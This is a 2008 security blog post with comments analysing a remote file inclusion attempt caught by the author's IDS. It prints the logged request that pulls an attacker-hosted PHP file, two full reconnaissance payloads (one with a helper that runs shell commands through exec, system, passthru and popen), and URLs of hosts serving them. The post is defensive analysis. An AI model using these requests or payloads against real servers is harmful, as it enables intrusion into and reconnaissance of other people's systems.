MrNeti Tries to Enter the House

Submitted by justin on Wed, 07/30/2008 - 14:19.

This was an interesting one: I just ran across this alert from my IDS: 

66.216.91.89 - - [30/Jul/2008:04:32:54 -0400] 
"GET /node//e404.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 4252

It seems someone is trying to read in an arbitrary file as part of a script execution. Tracking down the file I found it contained the following code: 

<?php
function ConvertBytes($number) {
$len = strlen($number);
if($len < 4) {
return sprintf("%d b", $number); }
if($len >= 4 && $len <=6) {
return sprintf("%0.2f Kb", $number/1024); }
if($len >= 7 && $len <=9) {
return sprintf("%0.2f Mb", $number/1024/1024); }
return sprintf("%0.2f Gb", $number/1024/1024/1024); }                          

echo "MrNETi<br>";
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;

echo "MrNETi<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;

Now, it this code were to execute (on my Linux VMware image) it would produce the following output: 

MrNETi
uid=74(apache) gid=74(apache) groups=74(apache) MrNETi
uname -a: Linux localhost 2.6.22.12-desktop586-1mdv #1 SMP Tue Nov 20 08:09:17 EST 2007 i686
os: Linux
id: uid=74(apache) gid=74(apache) groups=74(apache)
free: 3.46 Gb
used: 4.22 Gb
total: 7.68 Gb

This looks like a pretty basic reconnaissance script. Keep an eye out for it though, it's presence may lead to more nasty attacks. At the very least, if you see this content going over your wire you know a remote file include vulnerability exists and has been exploited.

I did a little checking and couldn't find any known systems that utilize e404.php that could be vulnerable to a file include attack, but I'm sure one is out there if folks are searching for it.

On and On

Submitted by justin on Thu, 07/31/2008 - 16:34.

This must be a popular attack, I found the same script at http://www.netops-fr.info/remote/ident.txt only that one is credited to Osirys. I found another at http://mabat.edumining.info/oye.txt that was credited to raCrew.

I also found a different version of the same sort of thing at http://www.netops-fr.info/remote/ident.txt that looks like this: 

<?php
//FeeLCoMz Response
$pwd1 =	@getcwd();
$un = @php_uname();
$os = @PHP_OS;
$id1 = ex("id");if (empty($id1)) {$id1 = @get_current_user();}
$sof1 =	@getenv("SERVER_SOFTWARE");
$php1 =	@phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = @gethostbyname($SERVER_ADDR);
$free1=	@diskfreespace($pwd1);
$all1= disk_total_space($pwd1);
$used =	ConvertBytes($all1-$free1);
$free =	ConvertBytes(@diskfreespace($pwd1));if (!$free) {$free = 0;}
$all = ConvertBytes(@disk_total_space($pwd1));if (!$all) {$all = 0;}
if (@is_writable($pwd1)) {$perm = "[W]";} else {$perm = "[R]";}
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {$sf = "ON";} else {$sf = "OFF";}

echo "FeeLCoMz".$sf."<br>";
echo "uname -a:	$un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software:	$sof1<br>";
echo "srvip: $ip1<br>";
echo "srvname: $name1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all $perm<br>";

function ConvertBytes($number) {
  $len = strlen($number);
  if($len < 4) { return sprintf("%d b", $number); }
  if($len >= 4 && $len <=6) { return sprintf("%0.2f Kb", $number/1024); }
  if($len >= 7 && $len <=9) { return sprintf("%0.2f Mb", $number/1024/1024); }
  return sprintf("%0.2f Gb", $number/1024/1024/1024);
}

function ex($cfe) {
  $res = '';
  if (!empty($cfe)) {
    if(function_exists('exec')) {
      @exec($cfe,$res);
      $res = join("\n",$res);
    } elseif(function_exists('shell_exec')) {
      $res = @shell_exec($cfe);
    } elseif(function_exists('system')) {
      @ob_start();
      @system($cfe);
      $res = @ob_get_contents();
      @ob_end_clean();
    } elseif(function_exists('passthru')) {
      @ob_start();
      @passthru($cfe);
      $res = @ob_get_contents();
      @ob_end_clean();
    } elseif(@is_resource($f = @popen($cfe,"r"))) {
      $res = "";
      while(!@feof($f)) { $res .= @fread($f,1024); }
      @pclose($f);
    } else { $res = "NULL"; }
  }
  return $res;
}

exit;

?>

RFI

Submitted by CG (not verified) on Fri, 08/29/2008 - 20:51.

I see quite a bit of that, just looking for RFIs in the web app and if it works it gets some info the box. cute.

Post new comment

The content of this field is kept private and will not be shown publicly.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Allowed HTML tags: <a> <em> <strong> <cite> <code> <ul> <ol> <li> <dl> <dt> <dd>
  • Lines and paragraphs break automatically.

More information about formatting options

Captcha Image: you will need to recognize the text in it.
Please type in the letters/numbers that are shown in the image above.